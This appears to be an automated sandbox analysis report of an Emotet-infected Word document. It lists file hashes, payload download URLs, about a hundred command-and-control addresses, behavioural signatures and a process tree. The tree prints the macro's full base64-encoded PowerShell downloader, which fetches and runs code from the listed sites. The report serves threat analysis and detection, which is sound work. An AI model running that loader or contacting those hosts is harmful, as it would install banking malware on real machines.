Analysis
-
max time kernel
19s -
max time network
19s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
28-10-2020 21:01
Static task
static1
General
-
Target
5177894154a2ad0d67c6ea62534a27cdc18b7cfe9c73c8ec6071d72fb8c198a2.doc
-
Size
224KB
-
MD5
f87d49246f2654da56ae321bdc8b58d8
-
SHA1
ef8f3f04dd249fa7dbc737d7d346020ff308f94f
-
SHA256
5177894154a2ad0d67c6ea62534a27cdc18b7cfe9c73c8ec6071d72fb8c198a2
-
SHA512
fb02be18f2ea24f0e0a970fd517dddce90c923cbdb3d1e0137031cfe0780741170ff6379dc10c5fd586e3109fa49d95a00a99ef55122b19f1b2ff730675567dc
Malware Config
Extracted
https://getpranaveda.xyz/wp-admin/yz/
http://xinhecun.cn/wp-content/VCNbWWDK/
https://www.apeduti.com.br/wp-includes/XN2wg26v/
http://heankan.bio/js/Rb/
https://sheen-vietnam.vn/wp-content/qtg2J6XhZ/
https://madrushdigital.com/wp-admin/PJi/
https://lunabituyelik.com/wp-content/fWd0/
Extracted
emotet
Epoch3
152.32.75.74:443
91.121.200.35:8080
159.203.16.11:8080
188.226.165.170:8080
172.193.79.237:80
123.216.134.52:80
183.91.3.63:80
139.59.61.215:443
185.80.172.199:80
77.74.78.80:443
153.229.219.1:443
113.203.238.130:80
120.51.34.254:80
116.202.10.123:8080
5.2.246.108:80
50.116.78.109:8080
103.80.51.61:8080
190.55.186.229:80
185.142.236.163:443
223.17.215.76:80
188.80.27.54:80
78.90.78.210:80
213.165.178.214:80
82.78.179.117:443
178.33.167.120:8080
58.27.215.3:8080
190.212.140.6:80
177.130.51.198:80
187.193.221.143:80
190.194.12.132:80
5.79.70.250:8080
2.82.75.215:80
79.133.6.236:8080
8.4.9.137:8080
188.166.220.180:7080
203.56.191.129:8080
58.94.58.13:80
189.123.103.233:80
190.180.65.104:80
54.38.143.245:8080
46.105.131.68:8080
119.228.75.211:80
162.144.145.58:8080
36.91.44.183:80
41.76.213.144:8080
202.29.237.113:8080
47.154.85.229:80
42.200.96.63:80
195.201.56.70:8080
41.185.29.128:8080
74.208.173.91:8080
91.83.93.103:443
126.126.139.26:443
190.85.46.52:7080
103.229.73.17:8080
203.153.216.178:7080
192.163.221.191:8080
113.161.148.81:80
115.79.59.157:80
78.101.224.151:80
73.55.128.120:80
180.148.4.130:8080
2.58.16.86:8080
192.210.217.94:8080
117.2.139.117:443
139.59.12.63:8080
179.5.118.12:80
5.2.164.75:80
178.254.36.182:8080
175.103.38.146:80
192.241.220.183:8080
198.20.228.9:8080
115.79.195.246:80
45.239.204.100:80
200.243.153.66:80
109.13.179.195:80
37.205.9.252:7080
172.105.78.244:8080
109.99.146.210:8080
121.117.147.153:443
46.32.229.152:8080
143.95.101.72:8080
157.7.164.178:8081
37.46.129.215:8080
73.100.19.104:80
181.59.59.54:80
5.12.246.155:80
60.108.128.186:80
185.208.226.142:8080
110.37.224.243:80
172.96.190.154:8080
75.127.14.170:8080
51.38.50.144:8080
103.93.220.182:80
109.206.139.119:80
95.76.142.243:80
190.164.135.81:80
190.192.39.136:80
197.221.227.78:80
85.246.78.192:80
91.75.75.46:80
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
POwersheLL.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 608 1292 POwersheLL.exe -
Emotet Payload 4 IoCs
Detects Emotet payload in memory.
Processes:
resource yara_rule behavioral1/memory/1724-13-0x0000000002280000-0x00000000022C3000-memory.dmp emotet behavioral1/memory/1724-14-0x00000000022D0000-0x0000000002312000-memory.dmp emotet behavioral1/memory/1168-18-0x00000000003A0000-0x00000000003E3000-memory.dmp emotet behavioral1/memory/1168-19-0x0000000000570000-0x00000000005B2000-memory.dmp emotet -
Blacklisted process makes network request 2 IoCs
Processes:
POwersheLL.exeflow pid process 7 608 POwersheLL.exe 9 608 POwersheLL.exe -
Executes dropped EXE 2 IoCs
Processes:
Avqv7t89l.exerdprefdrvapi.exepid process 1724 Avqv7t89l.exe 1168 rdprefdrvapi.exe -
Drops file in System32 directory 2 IoCs
Processes:
POwersheLL.exeAvqv7t89l.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk POwersheLL.exe File opened for modification C:\Windows\SysWOW64\PortableDeviceTypes\rdprefdrvapi.exe Avqv7t89l.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Processes:
WINWORD.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE -
Modifies registry class 280 IoCs
Processes:
WINWORD.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\TypeLib\{696F6D38-F97D-4D6B-9581-947F8A834FC1}\2.0\HELPDIR WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{696F6D38-F97D-4D6B-9581-947F8A834FC1}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\TypeLib\{696F6D38-F97D-4D6B-9581-947F8A834FC1}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{696F6D38-F97D-4D6B-9581-947F8A834FC1}\2.0 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{696F6D38-F97D-4D6B-9581-947F8A834FC1}\2.0\ = "Microsoft Forms 2.0 Object Library" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{696F6D38-F97D-4D6B-9581-947F8A834FC1}\2.0\0\win32 WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 108 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
POwersheLL.exerdprefdrvapi.exepid process 608 POwersheLL.exe 608 POwersheLL.exe 1168 rdprefdrvapi.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
POwersheLL.exedescription pid process Token: SeDebugPrivilege 608 POwersheLL.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 108 WINWORD.EXE 108 WINWORD.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
WINWORD.EXEAvqv7t89l.exedescription pid process target process PID 108 wrote to memory of 856 108 WINWORD.EXE splwow64.exe PID 108 wrote to memory of 856 108 WINWORD.EXE splwow64.exe PID 108 wrote to memory of 856 108 WINWORD.EXE splwow64.exe PID 108 wrote to memory of 856 108 WINWORD.EXE splwow64.exe PID 1724 wrote to memory of 1168 1724 Avqv7t89l.exe rdprefdrvapi.exe PID 1724 wrote to memory of 1168 1724 Avqv7t89l.exe rdprefdrvapi.exe PID 1724 wrote to memory of 1168 1724 Avqv7t89l.exe rdprefdrvapi.exe PID 1724 wrote to memory of 1168 1724 Avqv7t89l.exe rdprefdrvapi.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5177894154a2ad0d67c6ea62534a27cdc18b7cfe9c73c8ec6071d72fb8c198a2.doc"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exePOwersheLL -ENCOD UwBlAHQALQBJAFQARQBtACAAIAB2AEEAUgBJAEEAQgBsAGUAOgBFADMAOABaADYAIAAgACgAIAAgAFsAVABZAHAAZQBdACgAIgB7ADMAfQB7ADAAfQB7ADQAfQB7ADUAfQB7ADEAfQB7ADIAfQAiACAALQBmACAAJwB0AEUATQAnACwAJwBpAHIAJwAsACcARQBDAHQAbwBSAHkAJwAsACcAUwB5AFMAJwAsACcALgBpAG8AJwAsACcALgBEACcAKQApACAAOwBzAGUAVAAtAHYAQQByAGkAYQBCAEwARQAgACAARgBFAEIAOABXACAAIAAoACAAWwBUAHkAUABlAF0AKAAiAHsAMgB9AHsANQB9AHsAMAB9AHsANgB9AHsAMwB9AHsAMQB9AHsANAB9ACIAIAAtAGYAJwBFAE0ALgAnACwAJwBFAFAAbwBJACcALAAnAFMAJwAsACcALgBzAEUAcgBWAEkAYwAnACwAJwBOAFQAbQBhAG4AQQBnAEUAcgAnACwAJwBZAFMAVAAnACwAJwBuAGUAdAAnACkAKQAgACAAOwAkAFgAawBoADUAbQBvAGQAPQAoACgAJwBTAHkAcAAnACsAJwB6AHgAJwApACsAJwB3ACcAKwAnAHIAJwApADsAJABVADgANAB0AHQANwBjAD0AJABVAG0AawBoAHIAbwBzACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABFAHUAXwBhADMAcgA5ADsAJABJAGwAeABpAHkAagBjAD0AKAAoACcARQAzACcAKwAnAGkAJwApACsAJwBuAGwAJwArACcAawB1ACcAKQA7ACAAJABFADMAOAB6ADYAOgA6ACIAYwBgAFIAZQBgAEEAVABgAEUAYABEAEkAUgBFAGMAdABPAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcAaAA5AEwAJwArACcARABrAHUAOQAnACsAJwBiACcAKQArACgAJwAxAF8AaAAnACsAJwA5ACcAKQArACcATABBACcAKwAnAGEAJwArACgAJwBwAG4AMQB2AHYAJwArACcAaAA5ACcAKwAnAEwAJwApACkALQBSAEUAcABMAGEAQwBFACgAWwBjAGgAQQByAF0AMQAwADQAKwBbAGMAaABBAHIAXQA1ADcAKwBbAGMAaABBAHIAXQA3ADYAKQAsAFsAYwBoAEEAcgBdADkAMgApACkAOwAkAE8AZwB3AG8AbABvAGEAPQAoACgAJwBVAHkAJwArACcAeAAnACkAKwAoACcANABvACcAKwAnAGQAJwApACsAJwBfACcAKQA7ACAAKAAgAEcAYwBpACAAIABWAEEAcgBJAEEAYgBMAEUAOgBmAEUAQgA4AFcAIAApAC4AdgBhAEwAVQBFADoAOgAiAHMAZQBgAGMAdQBSAGAAaQB0AGAAWQBQAHIATwBUAE8AQwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAxACcAKQArACcAMgAnACkAOwAkAFQAaABtAGwAXwBqAHUAPQAoACgAJwBHAHMAYQB6ACcAKwAnAGcAJwApACsAJwBlACcAKwAnAGkAJwApADsAJABDADUAMgBwAHIAYQBtACAAPQAgACgAKAAnAEEAJwArACcAdgBxACcAKQArACgAJwB2ADcAdAAnACsAJwA4ADkAbAAnACkAKQA7ACQATABhAHcAawBvAGMANAA9ACgAJwBRAGQAJwArACcAMABpACcAKwAoACcAcABsACcAKwAnAHcAJwApACkAOwAkAEQANABuAGwAbAB5AHAAPQAoACcAVQAnACsAKAAnADQAeQAnACsAJwBwACcAKQArACgAJwBuACcAKwAnAGkAbAAnACkAKQA7ACQAWQB1AGwAaAB2AHAAZgA9ACQASABPAE0ARQArACgAKAAoACcAZwAnACsAJwBVADgAJwApACsAKAAnAEQAJwArACcAawB1ACcAKQArACgAJwA5ACcAKwAnAGIAMQBfACcAKwAnAGcAVQA4ACcAKQArACcAQQAnACsAKAAnAGEAcAAnACsAJwBuADEAdgAnACkAKwAoACcAdgBnAFUAJwArACcAOAAnACkAKQAuACIAcgBFAFAAYABMAEEAYABDAEUAIgAoACgAJwBnACcAKwAnAFUAOAAnACkALABbAHMAVABSAEkATgBHAF0AWwBDAGgAQQBSAF0AOQAyACkAKQArACQAQwA1ADIAcAByAGEAbQArACgAKAAnAC4AJwArACcAZQB4ACcAKQArACcAZQAnACkAOwAkAEEANgA1AHUAOABfAGUAPQAoACgAJwBYACcAKwAnAGgAcwBmADkANAAnACkAKwAnAGcAJwApADsAJABOAHUAcAByAHIAbQA4AD0ALgAoACcAbgBlAHcALQAnACsAJwBvAGIAagAnACsAJwBlAGMAdAAnACkAIABOAEUAVAAuAHcAZQBCAGMAbABpAEUATgB0ADsAJABQAGcAYQB0AGgAcgBhAD0AKAAoACcAaAAnACsAKAAnAHQAdABwAHMAJwArACcAOgBdAFsAJwApACsAJwAgACcAKwAoACgAJwAxACkAIAAnACsAJwBqACcAKQApACsAKAAnAGoAJwArACcAawBnACcAKQArACcAUwAnACsAJwAgAFsAJwArACgAKAAnAF0AIABbAF0AdwBdAFsAJwArACcAIAAxACcAKwAnACkAJwArACcAIAAnACkAKQArACcAagAnACsAKAAnAGoAawBnACcAKwAnAFMAIAAnACkAKwAoACcAWwBdACAAWwAnACsAJwBdAHcAJwApACsAKAAnAGcAZQB0AHAAJwArACcAcgBhAG4AYQAnACsAJwB2AGUAZAAnACkAKwAoACcAYQAnACsAJwAuACcAKwAnAHgAeQB6AF0AWwAgACcAKQArACgAKAAnADEAKQAnACkAKQArACgAJwAgAGoAagAnACsAJwBrACcAKQArACcAZwBTACcAKwAnACAAJwArACcAWwAnACsAKAAnAF0AIABbACcAKwAnAF0AJwApACsAKAAnAHcAJwArACcAdwBwAC0AYQBkAG0AaQBuACcAKwAnAF0AJwApACsAJwBbACcAKwAnACAAJwArACgAKAAnADEAKQAgACcAKwAnAGoAagAnACsAJwBrAGcAJwApACkAKwAnAFMAJwArACgAJwAgAFsAJwArACcAXQAgACcAKwAnAFsAXQAnACkAKwAoACcAdwB5AHoAJwArACcAXQAnACkAKwAoACcAWwAnACsAJwAgADEAJwApACsAKAAoACcAKQAnACsAJwAgAGoAJwApACkAKwAoACcAagAnACsAJwBrAGcAUwAgAFsAXQAnACkAKwAoACcAIAAnACsAJwBbAF0AdwAnACkAKwAoACcAQAAnACsAJwBoAHQAdAAnACkAKwAoACcAcAA6ACcAKwAnAF0AJwApACsAKAAnAFsAIAAnACsAJwAxACcAKQArACgAKAAnACkAJwArACcAIABqACcAKQApACsAJwBqAGsAJwArACgAJwBnAFMAJwArACcAIABbAF0AIAAnACkAKwAoACcAWwAnACsAJwBdAHcAXQAnACkAKwAoACgAJwBbACAAMQApACcAKwAnACAAJwArACcAagBqAGsAZwAnACkAKQArACgAJwBTACAAWwBdACcAKwAnACAAWwBdACcAKwAnAHcAeABpAG4AJwArACcAaABlAGMAdQAnACkAKwAnAG4AJwArACgAJwAuAGMAbgBdAFsAJwArACcAIAAnACkAKwAoACgAJwAxACkAIABqAGoAJwArACcAawAnACkAKQArACcAZwBTACcAKwAoACcAIABbACcAKwAnAF0AIABbACcAKwAnAF0AJwApACsAKAAnAHcAdwAnACsAJwBwAC0AYwAnACkAKwAnAG8AbgAnACsAJwB0ACcAKwAoACcAZQAnACsAJwBuAHQAXQBbACAAJwApACsAKAAoACcAMQAnACsAJwApACAAJwApACkAKwAoACcAagBqAGsAZwAnACsAJwBTACAAJwArACcAWwBdACcAKwAnACAAWwBdAHcAVgBDACcAKQArACgAJwBOAGIAJwArACcAVwAnACkAKwAoACcAVwBEACcAKwAnAEsAJwApACsAKAAnAF0AWwAnACsAJwAgACcAKQArACgAKAAnADEAKQAnACkAKQArACgAJwAgACcAKwAnAGoAagBrAGcAJwApACsAKAAnAFMAIABbAF0AJwArACcAIAAnACkAKwAoACcAWwBdAHcAQAAnACsAJwBoACcAKQArACcAdAAnACsAJwB0ACcAKwAoACcAcABzACcAKwAnADoAXQAnACsAJwBbACAAMQAnACkAKwAoACgAJwApACAAagAnACsAJwBqACcAKQApACsAKAAnAGsAZwBTACcAKwAnACAAWwAnACsAJwBdACAAJwApACsAKAAnAFsAJwArACcAXQB3AF0AWwAnACkAKwAnACAAMQAnACsAKAAoACcAKQAgACcAKQApACsAKAAnAGoAagAnACsAJwBrACcAKQArACgAJwBnAFMAIAAnACsAJwBbACcAKQArACgAJwBdACAAJwArACcAWwAnACkAKwAoACcAXQAnACsAJwB3AHcAJwArACcAdwB3AC4AJwArACcAYQBwAGUAZAAnACkAKwAoACcAdQAnACsAJwB0AGkALgAnACsAJwBjAG8AbQAuAGIAcgAnACkAKwAoACcAXQBbACcAKwAnACAAMQAnACkAKwAoACgAJwApACAAagBqAGsAZwBTACAAWwBdACAAWwAnACsAJwBdACcA